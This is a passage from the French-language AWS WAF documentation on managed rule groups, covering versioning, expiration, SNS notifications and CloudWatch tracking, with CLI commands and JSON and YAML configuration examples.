+ Le système définit une capacité maximale de 5 000 unités de capacité du pack de protection (ACL WebWCUs) () pour chaque pack de protection (ACL Web). Chaque groupe de règles possède un paramètre WCU qui doit être défini lors de sa création. Vous pouvez utiliser ce paramètre pour calculer les exigences de capacité supplémentaires que l'utilisation d'un groupe de règles ajouterait à votre pack de protection (ACL Web). Pour plus d'informations sur WCUs, voir[Unités de capacité Web ACL (WCUs) en AWS WAF](aws-waf-capacity-units.md).

Pour de plus amples informations sur les règles, veuillez consulter [AWS WAF règles](waf-rules.md).

Cette section fournit des conseils pour créer et gérer vos propres groupes de règles, décrit les groupes de règles gérés mis à votre disposition et fournit des conseils sur l'utilisation des groupes de règles gérés. 

**Topics**
+ [Utilisation de groupes de règles gérés dans AWS WAF](waf-managed-rule-groups.md)
+ [Gestion de vos propres groupes de règles](waf-user-created-rule-groups.md)
+ [AWS Marketplace groupes de règles](marketplace-rule-groups.md)
+ [Reconnaissance des groupes de règles fournis par d'autres services](waf-service-owned-rule-groups.md)

# Utilisation de groupes de règles gérés dans AWS WAF
<a name="waf-managed-rule-groups"></a>

Cette section explique ce que sont les groupes de règles gérés et comment ils fonctionnent.

Les groupes de règles gérés sont des ensembles de ready-to-use règles prédéfinies que AWS AWS Marketplace les vendeurs rédigent et mettent à jour pour vous. La AWS WAF tarification de base s'applique à votre utilisation de n'importe quel groupe de règles géré. Pour plus d'informations sur les AWS WAF tarifs, consultez la section [AWS WAF Tarification](https://aws.amazon.com/waf/pricing/).
+ *Les groupes de règles AWS gérées pour le contrôle des AWS WAF bots, la prévention du rachat de comptes AWS WAF Fraud Control (ATP) et la prévention des AWS WAF fraudes liées à la création de comptes Fraud Control (ACFP)* sont disponibles moyennant des frais supplémentaires, au-delà des AWS WAF frais de base. Pour plus d'informations sur la tarification, consultez la page [AWS WAF Pricing](https://aws.amazon.com/waf/pricing/) (Tarification). 
+ *Tous les autres groupes de règles AWS gérées* sont disponibles pour AWS WAF les clients sans frais supplémentaires. 
+ *AWS Marketplace les groupes de règles* sont disponibles par abonnement via AWS Marketplace. Chacun de ces groupes de règles est détenu et géré par le AWS Marketplace vendeur. Pour obtenir des informations sur les prix relatifs à l'utilisation d'un groupe de AWS Marketplace règles, contactez le AWS Marketplace vendeur. 

Certains groupes de règles gérés sont conçus pour protéger des types spécifiques d'applications Web telles que WordPress Joomla ou PHP. D'autres offrent une protection étendue contre les menaces connues ou les vulnérabilités courantes des applications Web, notamment certaines de celles répertoriées dans le [Top 10 de l'OWASP](https://owasp.org/www-project-top-ten/). Si vous êtes soumis à des conformités réglementaires telles que PCI et HIPAA, vous pouvez utiliser les groupes de règles gérées pour satisfaire les exigences de pare-feu des applications web.

**Mises à jour automatiques**  
La mise à jour dans le contexte d'un paysage de menaces en constante évolution peut prendre du temps et coûter cher. Les groupes de règles gérés peuvent vous faire gagner du temps lors de leur mise en œuvre et de leur utilisation AWS WAF. De nombreux AWS AWS Marketplace vendeurs mettent automatiquement à jour les groupes de règles gérés et fournissent de nouvelles versions des groupes de règles lorsque de nouvelles vulnérabilités et menaces apparaissent. 

Dans certains cas, AWS est informée des nouvelles vulnérabilités avant leur divulgation publique, en raison de sa participation à un certain nombre de communautés de divulgation privées. Dans ces cas, AWS vous pouvez mettre à jour les groupes de règles AWS gérées et les déployer pour vous avant même qu'une nouvelle menace ne soit connue de tous. 

**Accès restreint aux règles d'un groupe de règles géré**  
Chaque groupe de règles géré fournit une description complète des types d'attaques et de vulnérabilités contre lesquels il est conçu pour se protéger. Pour protéger la propriété intellectuelle des fournisseurs de groupes de règles, vous ne pouvez pas consulter tous les détails des règles individuelles au sein d'un groupe de règles. Cette restriction permet également d'empêcher les utilisateurs malveillants de concevoir des menaces qui contournent les règles publiées.

**Topics**
+ [Utilisation de groupes de règles gérés versionnés dans AWS WAF](waf-managed-rule-groups-versioning.md)
+ [Utilisation des groupes de règles gérés](waf-using-managed-rule-groups.md)
+ [AWS Règles gérées pour AWS WAF](aws-managed-rule-groups.md)

# Utilisation de groupes de règles gérés versionnés dans AWS WAF
<a name="waf-managed-rule-groups-versioning"></a>

Cette section explique comment le versionnement est géré pour les groupes de règles gérés.

De nombreux fournisseurs de groupes de règles gérés utilisent le versionnement pour mettre à jour les options et les fonctionnalités d'un groupe de règles. En général, une version spécifique d'un groupe de règles géré est statique. Parfois, un fournisseur peut avoir besoin de mettre à jour certaines ou toutes les versions statiques d'un groupe de règles géré, par exemple pour répondre à une menace de sécurité émergente. 

Lorsque vous utilisez un groupe de règles géré versionné dans votre pack de protection (ACL Web), vous pouvez sélectionner la version par défaut et laisser le fournisseur gérer la version statique que vous utilisez, ou vous pouvez sélectionner une version statique spécifique. 

**Vous ne trouvez pas la version que vous recherchez ?**  
Si aucune version ne figure dans la liste des versions d'un groupe de règles, il est probable qu'elle arrive à expiration ou qu'elle a déjà expiré. Une fois l'expiration d'une version programmée, vous AWS WAF ne pouvez plus la choisir pour le groupe de règles. 

**Notifications SNS pour les AWS groupes de règles gérées**  
Les groupes de règles AWS gérées fournissent tous des notifications de version et de mise à jour SNS, à l'exception des groupes de règles de réputation IP. Les groupes de règles AWS gérées qui fournissent des notifications utilisent tous la même rubrique SNS : Amazon Resource Name (ARN). Pour vous inscrire aux notifications SNS, consultez[Être informé des nouvelles versions et mises à jour](waf-using-managed-rule-groups-sns-topic.md).

**Topics**
+ [Cycle de vie des versions pour les groupes de règles gérés](waf-managed-rule-groups-versioning-lifecycle.md)
+ [Expiration de version pour les groupes de règles gérés](waf-managed-rule-groups-versioning-expiration.md)
+ [Meilleures pratiques pour gérer les versions de groupes de règles gérés](waf-managed-rule-groups-best-practice.md)

# Cycle de vie des versions pour les groupes de règles gérés
<a name="waf-managed-rule-groups-versioning-lifecycle"></a>

Les fournisseurs gèrent les étapes du cycle de vie suivantes d'une version statique d'un groupe de règles géré : 
+ **Publication et mises à jour** : un fournisseur de groupes de règles gérés annonce les versions statiques à venir et les nouvelles versions statiques de ses groupes de règles gérés par le biais de notifications adressées à une rubrique Amazon Simple Notification Service (Amazon SNS). Les fournisseurs peuvent également utiliser cette rubrique pour communiquer d'autres informations importantes concernant leurs groupes de règles, telles que les mises à jour urgentes requises. 

  Vous pouvez vous abonner à la rubrique du groupe de règles et configurer la manière dont vous souhaitez recevoir les notifications. Pour de plus amples informations, veuillez consulter [Être informé des nouvelles versions et mises à jour](waf-using-managed-rule-groups-sns-topic.md).
+ **Planification de l'expiration** : un fournisseur de groupes de règles gérés planifie l'expiration des anciennes versions d'un groupe de règles. Une version dont l'expiration est prévue ne peut pas être ajoutée aux règles de votre pack de protection (ACL Web). Une fois l'expiration programmée pour une version, AWS WAF suit l'expiration à l'aide d'un compte à rebours sur Amazon CloudWatch. 
+ **Expiration de version** : si un pack de protection (ACL Web) est configuré pour utiliser une version expirée d'un groupe de règles géré, la version par défaut du groupe de règles est AWS WAF utilisée lors de l'évaluation du pack de protection (ACL Web). AWS WAF Bloque également toutes les mises à jour du pack de protection (ACL Web) qui ne suppriment pas le groupe de règles ou ne modifient pas sa version pour une version non expirée.

Si vous utilisez des groupes de règles AWS Marketplace gérés, demandez au fournisseur des informations supplémentaires sur le cycle de vie des versions. 

# Expiration de version pour les groupes de règles gérés
<a name="waf-managed-rule-groups-versioning-expiration"></a>

 Cette section explique comment fonctionne l'expiration des versions pour un groupe de règles géré versionné.

Si vous utilisez une version spécifique d'un groupe de règles, assurez-vous de ne pas continuer à utiliser une version au-delà de sa date d'expiration. Vous pouvez surveiller l'expiration des versions via les notifications SNS du groupe de règles et via les CloudWatch métriques Amazon. 

Si une version que vous utilisez dans un pack de protection (ACL Web) a expiré, AWS WAF bloque toutes les mises à jour du pack de protection (ACL Web) qui n'incluent pas le déplacement du groupe de règles vers une version non expirée. Vous pouvez mettre à jour le groupe de règles vers une version disponible ou le supprimer de votre pack de protection (ACL Web). 

La gestion de l'expiration pour un groupe de règles géré dépend du fournisseur du groupe de règles. Pour les groupes de règles AWS gérées, une version expirée est automatiquement remplacée par la version par défaut du groupe de règles. Pour les groupes de AWS Marketplace règles, demandez au fournisseur comment il gère l'expiration.

Lorsque le fournisseur crée une nouvelle version du groupe de règles, il définit la durée de vie prévue de la version. Bien que l'expiration de la version ne soit pas prévue, la valeur de la CloudWatch métrique Amazon est définie en fonction du paramètre de durée de vie CloudWatch prévisionnelle, et vous verrez une valeur fixe pour la métrique. Une fois que le fournisseur a programmé l'expiration de la métrique, la valeur de la métrique diminue chaque jour jusqu'à atteindre zéro le jour de l'expiration. Pour plus d'informations sur le suivi de l'expiration, consultez[Expiration des versions de suivi](waf-using-managed-rule-groups-expiration.md).

# Meilleures pratiques pour gérer les versions de groupes de règles gérés
<a name="waf-managed-rule-groups-best-practice"></a>

Suivez ce guide de bonnes pratiques pour gérer le versionnement lorsque vous utilisez un groupe de règles géré versionné.

Lorsque vous utilisez un groupe de règles géré dans votre pack de protection (ACL Web), vous pouvez choisir d'utiliser une version statique spécifique du groupe de règles, ou vous pouvez choisir d'utiliser la version par défaut : 
+ **Version par défaut** : définit AWS WAF toujours la version par défaut sur la version statique actuellement recommandée par le fournisseur. Lorsque le fournisseur met à jour la version statique recommandée, met AWS WAF automatiquement à jour le paramètre de version par défaut pour le groupe de règles dans votre pack de protection (ACL Web). 

  Lorsque vous utilisez la version par défaut d'un groupe de règles géré, suivez les bonnes pratiques suivantes : 
  + **Abonnez-vous aux notifications** : abonnez-vous aux notifications concernant les modifications apportées au groupe de règles et surveillez-les. La plupart des fournisseurs envoient une notification avancée des nouvelles versions statiques et des modifications de version par défaut. Ils vous permettent de vérifier les effets d'une nouvelle version statique avant AWS de passer à la version par défaut. Pour de plus amples informations, veuillez consulter [Être informé des nouvelles versions et mises à jour](waf-using-managed-rule-groups-sns-topic.md).
  + Passez en **revue les effets des paramètres de version statique et apportez les modifications nécessaires avant que votre valeur par défaut ne soit définie** sur cette valeur — Avant que votre valeur par défaut ne soit définie sur une nouvelle version statique, examinez les effets de la version statique sur le suivi et la gestion de vos requêtes Web. La nouvelle version statique peut comporter de nouvelles règles à revoir. Recherchez les faux positifs ou tout autre comportement inattendu, au cas où vous auriez besoin de modifier la façon dont vous utilisez le groupe de règles. Vous pouvez définir des règles de comptage, par exemple pour les empêcher de bloquer le trafic pendant que vous déterminez comment vous souhaitez gérer le nouveau comportement. Pour de plus amples informations, veuillez consulter [Tester et ajuster vos AWS WAF protections](web-acl-testing.md).
+ **Version statique** : si vous choisissez d'utiliser une version statique, vous devez mettre à jour manuellement le paramètre de version lorsque vous êtes prêt à adopter une nouvelle version du groupe de règles. 

  Lorsque vous utilisez une version statique d'un groupe de règles géré, suivez les bonnes pratiques suivantes : 
  + **Maintenez votre version à jour** : veillez à ce que votre groupe de règles géré soit le plus proche possible de la dernière version. Lorsqu'une nouvelle version est publiée, testez-la, ajustez les paramètres selon les besoins et implémentez-la rapidement. Pour plus d'informations sur les tests, consultez[Tester et ajuster vos AWS WAF protections](web-acl-testing.md).
  + **Abonnement aux notifications** : abonnez-vous aux notifications relatives aux modifications apportées au groupe de règles, afin de savoir quand votre fournisseur publie de nouvelles versions statiques. La plupart des fournisseurs notifient à l'avance les modifications de version. En outre, votre fournisseur devra peut-être mettre à jour la version statique que vous utilisez pour combler une faille de sécurité ou pour d'autres raisons urgentes. Vous saurez ce qui se passe si vous êtes abonné aux notifications du fournisseur. Pour de plus amples informations, veuillez consulter [Être informé des nouvelles versions et mises à jour](waf-using-managed-rule-groups-sns-topic.md).
  + **Évitez l'expiration des versions** : ne permettez pas à une version statique d'expirer pendant que vous l'utilisez. La gestion des versions expirées par le fournisseur peut varier et peut inclure le fait de forcer une mise à niveau vers une version disponible ou d'autres modifications susceptibles d'avoir des conséquences inattendues. Suivez la métrique AWS WAF d'expiration et définissez une alarme qui vous donne un nombre de jours suffisant pour réussir la mise à niveau vers une version prise en charge. Pour de plus amples informations, veuillez consulter [Expiration des versions de suivi](waf-using-managed-rule-groups-expiration.md).



# Utilisation des groupes de règles gérés
<a name="waf-using-managed-rule-groups"></a>

Cette section fournit des conseils pour accéder à vos groupes de règles gérés et les gérer. 

Lorsque vous ajoutez un groupe de règles géré à votre pack de protection (ACL Web), vous pouvez choisir les mêmes options de configuration que vos propres groupes de règles, ainsi que des paramètres supplémentaires. 

La console vous permet d'accéder aux informations des groupes de règles gérés pendant le processus d'ajout et de modification des règles dans vos packs de protection (Web ACLs). Par le biais de l'interface de ligne de commande (CLI) APIs et de l'interface de ligne de commande (CLI), vous pouvez directement demander des informations sur les groupes de règles gérés.

Lorsque vous utilisez un groupe de règles géré dans votre pack de protection (ACL Web), vous pouvez modifier les paramètres suivants : 
+ **Version** : cette option n'est disponible que si le groupe de règles est versionné. Pour de plus amples informations, veuillez consulter [Utilisation de groupes de règles gérés versionnés dans AWS WAF](waf-managed-rule-groups-versioning.md).
+ **Remplacer les actions des règles** : vous pouvez remplacer les actions des règles du groupe de règles par n'importe quelle action. CountIl est utile de les définir sur pour tester un groupe de règles avant de l'utiliser pour gérer vos requêtes Web. Pour de plus amples informations, veuillez consulter [Les actions des règles du groupe de règles remplacent les actions](web-acl-rule-group-override-options.md#web-acl-rule-group-override-options-rules).
+ **Instruction scope-down** : vous pouvez ajouter une instruction scope-down pour filtrer les requêtes Web que vous ne souhaitez pas évaluer avec le groupe de règles. Pour de plus amples informations, veuillez consulter [Utilisation d'instructions scope-down dans AWS WAF](waf-rule-scope-down-statements.md).
+ **Annuler l'action du groupe de règles** : vous pouvez annuler l'action résultant de l'évaluation du groupe de règles et lui attribuer Count la valeur uniquement. Cette option n'est pas couramment utilisée. Cela ne modifie pas la façon dont AWS WAF les règles du groupe de règles sont évaluées. Pour de plus amples informations, veuillez consulter [L'action de retour du groupe de règles est remplacée par Count](web-acl-rule-group-override-options.md#web-acl-rule-group-override-options-rule-group).

**Pour modifier les paramètres des groupes de règles gérés dans votre pack de protection (ACL Web)**
+ **Console** 
  + (Option) Lorsque vous ajoutez le groupe de règles gérées à votre pack de protection (ACL Web), vous pouvez choisir **Modifier** pour afficher et modifier les paramètres. 
  + (Option) Après avoir ajouté le groupe de règles géré à votre pack de protection (ACL Web), sur la page **des packs de protection (Web ACLs)**, choisissez le pack de protection (ACL Web) que vous venez de créer. Cela vous amène à la page d'édition du pack de protection (ACL Web). 
    + Choisissez **Rules (Règles)**. 
    + Sélectionnez le groupe de règles, puis choisissez **Modifier** pour afficher et modifier les paramètres. 
+ **APIs et CLI** : en dehors de la console, vous pouvez gérer les paramètres du groupe de règles géré lorsque vous créez et mettez à jour le pack de protection (ACL Web). 

# Récupération de la liste des groupes de règles gérés
<a name="waf-using-managed-rule-groups-list"></a>

Vous pouvez récupérer la liste des groupes de règles gérés que vous pouvez utiliser dans vos packs de protection (Web ACLs). La liste inclut les éléments suivants : 
+ Tous les groupes de règles de règles AWS gérées.
+ Les groupes de AWS Marketplace règles auxquels vous êtes abonné. 
**Note**  
Pour plus d'informations sur l'abonnement à des groupes de AWS Marketplace règles, consultez[AWS Marketplace groupes de règles](marketplace-rule-groups.md).

Lorsque vous récupérez la liste des groupes de règles gérés, la liste que vous obtenez dépend de l'interface que vous utilisez : 
+ **Console** : via la console, vous pouvez voir tous les groupes de règles gérés, y compris les groupes de AWS Marketplace règles auxquels vous n'êtes pas encore abonné. Pour ceux auxquels vous n'êtes pas encore abonné, l'interface fournit des liens que vous pouvez suivre pour vous abonner. 
+ **APIs et CLI** : en dehors de la console, votre demande renvoie uniquement les groupes de règles que vous pouvez utiliser. 

**Pour récupérer la liste des groupes de règles gérés**
+ **Console** — Au cours du processus de création d'une ACL Web, sur la page **Ajouter des règles et des groupes** de règles, choisissez **Ajouter des groupes de règles gérés**. Au niveau supérieur, les noms des fournisseurs sont répertoriés. Développez la liste de chaque fournisseur pour voir la liste des groupes de règles gérés. Pour les groupes de règles versionnés, les informations affichées à ce niveau concernent la version par défaut. Lorsque vous ajoutez un groupe de règles géré à votre pack de protection (ACL Web), la console le répertorie en fonction du schéma de dénomination`<Vendor Name>-<Managed Rule Group Name>`. 
+ **API** —
  +  `ListAvailableManagedRuleGroups`
+ **CLI** —
  + `aws wafv2 list-available-managed-rule-groups --scope=<CLOUDFRONT|REGIONAL>`

# Récupération des règles dans un groupe de règles géré
<a name="waf-using-managed-rule-groups-rules"></a>

Vous pouvez récupérer la liste des règles d'un groupe de règles géré. Les appels d'API et de CLI renvoient les spécifications des règles auxquelles vous pouvez faire référence dans le modèle JSON ou via celui-ci AWS CloudFormation.

**Pour extraire la liste des règles d'un groupe de règles gérées**
+ **Console** 
  + (Option) Lorsque vous ajoutez le groupe de règles gérées à votre pack de protection (ACL Web), vous pouvez choisir **Modifier** pour afficher les règles. 
  + (Option) Après avoir ajouté le groupe de règles géré à votre pack de protection (ACL Web), sur la page **des packs de protection (Web ACLs)**, choisissez le pack de protection (ACL Web) que vous venez de créer. Cela vous amène à la page d'édition du pack de protection (ACL Web). 
    + Choisissez **Rules (Règles)**. 
    + Sélectionnez le groupe de règles pour lequel vous souhaitez voir une liste de règles, puis choisissez **Modifier**. AWS WAF affiche la liste des règles du groupe de règles. 
+ **API** — `DescribeManagedRuleGroup`
+ **CLI** — `aws wafv2 describe-managed-rule-group --scope=<CLOUDFRONT|REGIONAL> --vendor-name <vendor> --name <managedrule_name>`

# Extraction des versions disponibles pour un groupe de règles géré
<a name="waf-using-managed-rule-groups-versions"></a>

Les versions disponibles d'un groupe de règles géré sont des versions dont l'expiration n'a pas encore été programmée. La liste indique quelle version est la version par défaut actuelle pour le groupe de règles.

**Pour récupérer la liste des versions disponibles d'un groupe de règles géré**
+ **Console** 
  + (Option) Lorsque vous ajoutez le groupe de règles géré à votre pack de protection (ACL Web), choisissez **Modifier** pour voir les informations du groupe de règles. Développez le menu déroulant **Version** pour voir la liste des versions disponibles. 
  + (Option) Après avoir ajouté le groupe de règles géré à votre pack de protection (ACL Web), choisissez **Modifier** dans le pack de protection (ACL Web), puis sélectionnez et modifiez la règle du groupe de règles. Développez le menu déroulant **Version** pour voir la liste des versions disponibles. 
+ **API** —
  +  `ListAvailableManagedRuleGroupVersions`
+ **CLI** —
  +  `aws wafv2 list-available-managed-rule-group-versions --scope=<CLOUDFRONT|REGIONAL> --vendor-name <vendor> --name <managedrule_name>`

# Ajout d'un groupe de règles géré à un pack de protection (ACL Web) via la console
<a name="waf-using-managed-rule-group"></a>

Cette section explique comment ajouter un groupe de règles géré à un pack de protection (ACL Web) via la console. Ces instructions s'appliquent à tous les groupes de règles AWS Managed Rules et aux groupes de AWS Marketplace règles auxquels vous êtes abonné. 

**Risque lié au trafic de production**  
Avant de déployer des modifications dans votre pack de protection (ACL Web) pour le trafic de production, testez-les et ajustez-les dans un environnement intermédiaire ou de test jusqu'à ce que vous soyez à l'aise avec l'impact potentiel sur votre trafic. Testez et ajustez ensuite vos règles mises à jour en mode décompte avec votre trafic de production avant de les activer. Pour de plus amples informations, consultez [Tester et ajuster vos AWS WAF protections](web-acl-testing.md).

**Note**  
L'utilisation de plus de 1 500 unités WCUs dans un pack de protection (ACL Web) entraîne des coûts supérieurs au prix du pack de protection de base (ACL Web). Pour plus d'informations, veuillez consulter les sections [Unités de capacité Web ACL (WCUs) en AWS WAF](aws-waf-capacity-units.md) et [Tarification d'AWS WAF](https://aws.amazon.com/waf/pricing/).

**Pour ajouter un groupe de règles géré à un pack de protection (ACL Web) via la console**

**Pour ajouter un groupe de règles géré à une ACL Web via la console**

1. Connectez-vous à la AWS WAF console AWS Management Console et ouvrez-la sur [https://console.aws.amazon.com/wafv2/homev2](https://console.aws.amazon.com/wafv2/homev2). 

1. Choisissez les **packs de protection (Web ACLs)** dans le volet de navigation. 

1. Sur la page **des packs de protection (Web ACLs)**, dans la liste des packs de protection (Web ACLs), sélectionnez celui auquel vous souhaitez ajouter le groupe de règles. Cela vous amène à la page du pack de protection unique (ACL Web).

1. Sur la page de votre pack de protection (ACL Web), choisissez l'onglet **Règles**. 

1. Dans le volet **Règles**, choisissez **Ajouter des règles**, puis **Ajouter des groupes de règles gérés**. 

1. Sur la page **Ajouter des groupes de règles gérés**, élargissez la sélection de votre fournisseur de groupes de règles pour voir la liste des groupes de règles disponibles. 

1. Pour chaque groupe de règles que vous souhaitez ajouter, choisissez **Ajouter au pack de protection (ACL Web)**. Si vous souhaitez modifier la configuration du pack de protection (ACL Web) pour le groupe de règles, choisissez **Modifier**, apportez vos modifications, puis sélectionnez **Enregistrer la règle**. Pour plus d'informations sur les options, consultez le guide de gestion des versions sur [Utilisation de groupes de règles gérés versionnés dans AWS WAF](waf-managed-rule-groups-versioning.md) et le guide d'utilisation d'un groupe de règles géré dans un pack de protection (ACL Web) sur[Utilisation des instructions de groupes de règles gérés dans AWS WAF](waf-rule-statement-type-managed-rule-group.md).

1. Au bas de la page **Ajouter des groupes de règles gérés**, choisissez **Ajouter des règles**. 

1. Sur la page **Définir la priorité des règles**, ajustez l'ordre d'exécution des règles selon les besoins, puis choisissez **Enregistrer**. Pour de plus amples informations, veuillez consulter [Définition de la priorité des règles](web-acl-processing-order.md). 

Sur la page de votre pack de protection (ACL Web), les groupes de règles gérés que vous avez ajoutés sont répertoriés sous l'onglet **Règles**. 

Testez et ajustez les modifications apportées à vos AWS WAF protections avant de les utiliser pour le trafic de production. Pour plus d'informations, consultez [Tester et ajuster vos AWS WAF protections](web-acl-testing.md).

**Incohérences temporaires lors des mises à jour**  
Lorsque vous créez ou modifiez un pack de protection (ACL Web) ou d'autres AWS WAF ressources, les modifications mettent peu de temps à se propager à toutes les zones où les ressources sont stockées. Le temps de propagation peut aller de quelques secondes à plusieurs minutes. 

Voici des exemples d'incohérences temporaires que vous pourriez remarquer lors de la propagation des modifications : 
+ Après avoir créé un pack de protection (ACL Web), si vous essayez de l'associer à une ressource, vous pouvez obtenir une exception indiquant que le pack de protection (ACL Web) n'est pas disponible. 
+ Une fois que vous avez ajouté un groupe de règles à un pack de protection (ACL Web), les nouvelles règles du groupe de règles peuvent être en vigueur dans une zone où le pack de protection (ACL Web) est utilisé et pas dans une autre.
+ Une fois que vous avez modifié le paramètre d'une action de règle, vous pouvez voir l'ancienne action à certains endroits et la nouvelle action à d'autres. 
+ Après avoir ajouté une adresse IP à un ensemble d'adresses IP utilisé dans une règle de blocage, la nouvelle adresse peut être bloquée dans une zone alors qu'elle est toujours autorisée dans une autre.

# Être informé des nouvelles versions et des mises à jour d'un groupe de règles géré
<a name="waf-using-managed-rule-groups-sns-topic"></a>

Cette section explique comment recevoir les notifications Amazon SNS concernant les nouvelles versions et les mises à jour.

Un fournisseur de groupes de règles gérés utilise les notifications SNS pour annoncer les modifications apportées aux groupes de règles, telles que les nouvelles versions à venir et les mises à jour de sécurité urgentes. 

**Comment s'abonner aux notifications SNS**  
Pour vous abonner aux notifications d'un groupe de règles, vous devez créer un abonnement Amazon SNS pour l'ARN de la rubrique Amazon SNS du groupe de règles dans la région us-east-1 des États-Unis (Virginie du Nord). 

Pour plus d'informations sur la procédure d'abonnement, consultez le [guide du développeur Amazon Simple Notification Service](https://docs.aws.amazon.com/sns/latest/dg/). 

**Note**  
Créez votre abonnement au sujet SNS uniquement dans la région us-east-1.

Les groupes de règles AWS gérées versionnés utilisent tous la même rubrique SNS : Amazon Resource Name (ARN). Pour plus d'informations sur les notifications de groupes de règles AWS gérées, consultez[Notifications de déploiement](waf-managed-rule-groups-deployments-notifications.md).

**Où trouver l'ARN de la rubrique Amazon SNS pour un groupe de règles géré**  
AWS Les groupes de règles gérées utilisent un seul ARN de rubrique SNS. Vous pouvez donc récupérer l'ARN du sujet auprès de l'un des groupes de règles et vous y abonner pour recevoir des notifications pour tous les groupes de règles de règles AWS gérées qui fournissent des notifications SNS. 
+ **Console** 
  + (Option) Lorsque vous ajoutez le groupe de règles géré à votre pack de protection (ACL Web), choisissez **Modifier** pour voir les informations du groupe de règles, y compris l'ARN de la rubrique Amazon SNS du groupe de règles. 
  + (Option) Après avoir ajouté le groupe de règles géré à votre pack de protection (ACL Web), choisissez **Modifier** dans le pack de protection (ACL Web), puis sélectionnez et modifiez la règle du groupe de règles pour voir l'ARN de la rubrique Amazon SNS du groupe de règles. 
+ **API** — `DescribeManagedRuleGroup`
+ **CLI** — `aws wafv2 describe-managed-rule-group --scope=<CLOUDFRONT|REGIONAL> --vendor-name <vendor> --name <managedrule_name>`

Pour obtenir des informations générales sur les formats de notification Amazon SNS et sur la manière de filtrer les notifications que vous recevez, consultez la section [Analyse des formats de message](https://docs.aws.amazon.com/sns/latest/dg/sns-message-and-json-formats.html) et [politiques de filtrage des abonnements Amazon SNS dans](https://docs.aws.amazon.com/sns/latest/dg/sns-subscription-filter-policies.html) le guide du développeur Amazon Simple Notification Service. 

# Suivi de l'expiration des versions d'un groupe de règles
<a name="waf-using-managed-rule-groups-expiration"></a>

Cette section explique comment surveiller le calendrier d'expiration d'un groupe de règles géré via Amazon CloudWatch.

Si vous utilisez une version spécifique d'un groupe de règles, assurez-vous de ne pas continuer à utiliser une version au-delà de sa date d'expiration. 

**Astuce**  
Inscrivez-vous aux notifications Amazon SNS pour les groupes de règles gérés et tenez-vous au courant des versions des groupes de règles gérés. Vous bénéficierez de la plus grande up-to-date protection offerte par le groupe de règles et vous éviterez l'expiration. Pour plus d'informations, consultez [Être informé des nouvelles versions et mises à jour](waf-using-managed-rule-groups-sns-topic.md).

**Pour surveiller le calendrier d'expiration d'un groupe de règles géré via Amazon CloudWatch**

1. Dans CloudWatch, recherchez les mesures d'expiration AWS WAF de votre groupe de règles géré. Les métriques ont les noms et les dimensions suivants : 
   + Nom de métrique : DaysToExpiry
   + Dimensions métriques : RegionManagedRuleGroup,Vendor, et Version

   Si votre pack de protection (ACL Web) contient un groupe de règles géré qui évalue le trafic, vous obtiendrez une métrique correspondante. La métrique n'est pas disponible pour les groupes de règles que vous n'utilisez pas. 

1. Définissez une alarme sur les métriques qui vous intéressent, afin d'être averti à temps pour passer à une version plus récente du groupe de règles. 

Pour plus d'informations sur l'utilisation CloudWatch des métriques Amazon et la configuration des alarmes, consultez le [guide de CloudWatch l'utilisateur Amazon](https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/). 

# Exemples de configurations de groupes de règles gérés en JSON et YAML
<a name="waf-using-managed-rule-groups-json-yaml"></a>

Cette section fournit des exemples de configurations de groupes de règles gérés.

Les appels d'API et de CLI renvoient une liste de toutes les règles du groupe de règles géré auxquelles vous pouvez faire référence dans le modèle JSON ou via celui-ci AWS CloudFormation.

**JSON**  
Vous pouvez référencer et modifier des groupes de règles gérées au sein d'une instruction de règle à l'aide de JSON. La liste suivante montre le groupe de règles AWS gérées`AWSManagedRulesCommonRuleSet`, au format JSON. La RuleActionOverrides spécification répertorie une règle dont l'action a été remplacée par. Count 

```
{
    "Name": "AWS-AWSManagedRulesCommonRuleSet",
    "Priority": 0,
    "Statement": {
      "ManagedRuleGroupStatement": {
        "VendorName": "AWS",
        "Name": "AWSManagedRulesCommonRuleSet",
        "RuleActionOverrides": [                                                                                                                                            
          {                                                                                                                                                                
            "ActionToUse": {                                                                                                                                              
              "Count": {}                                                                                                                                                
            },                                                                                                                                                            
            "Name": "NoUserAgent_HEADER"                                                                                                                                 
          }                                                                                                                                                                
        ],
        "ExcludedRules": []
      }
    },
    "OverrideAction": {
      "None": {}
    },
    "VisibilityConfig": {
      "SampledRequestsEnabled": true,
      "CloudWatchMetricsEnabled": true,
      "MetricName": "AWS-AWSManagedRulesCommonRuleSet"
    }
}
```

**YAML**  
Vous pouvez référencer et modifier des groupes de règles gérés dans une déclaration de règle à l'aide du modèle CloudFormation YAML. La liste suivante montre le groupe de règles AWS gérées`AWSManagedRulesCommonRuleSet`, dans le CloudFormation modèle. La RuleActionOverrides spécification répertorie une règle dont l'action a été remplacée par. Count 

```
Name: AWS-AWSManagedRulesCommonRuleSet
Priority: 0
Statement:
  ManagedRuleGroupStatement:
    VendorName: AWS
    Name: AWSManagedRulesCommonRuleSet
    RuleActionOverrides:
    - ActionToUse:
        Count: {}
      Name: NoUserAgent_HEADER
    ExcludedRules: []
OverrideAction:
  None: {}
VisibilityConfig:
  SampledRequestsEnabled: true
  CloudWatchMetricsEnabled: true
  MetricName: AWS-AWSManagedRulesCommonRuleSet
```

# AWS Règles gérées pour AWS WAF
<a name="aws-managed-rule-groups"></a>

Cette section explique AWS à quoi servent les AWS WAF règles gérées.

AWS Managed Rules for AWS WAF est un service géré qui fournit une protection contre les vulnérabilités des applications ou tout autre trafic indésirable. Vous avez la possibilité de sélectionner un ou plusieurs groupes de règles dans Règles AWS gérées pour chaque ACL Web, jusqu'à la limite de capacité maximale du pack de protection (ACL Web) (WCU). 

**Atténuer les faux positifs et tester les modifications des groupes de règles**  
Avant d'utiliser un groupe de règles géré en production, testez-le dans un environnement hors production conformément aux [Tester et ajuster vos AWS WAF protections](web-acl-testing.md) instructions de. Suivez les instructions de test et de réglage lorsque vous ajoutez un groupe de règles à votre pack de protection (ACL Web), pour tester une nouvelle version d'un groupe de règles et chaque fois qu'un groupe de règles ne gère pas votre trafic Web comme vous le souhaitez. 

**Responsabilités de sécurité partagées**  
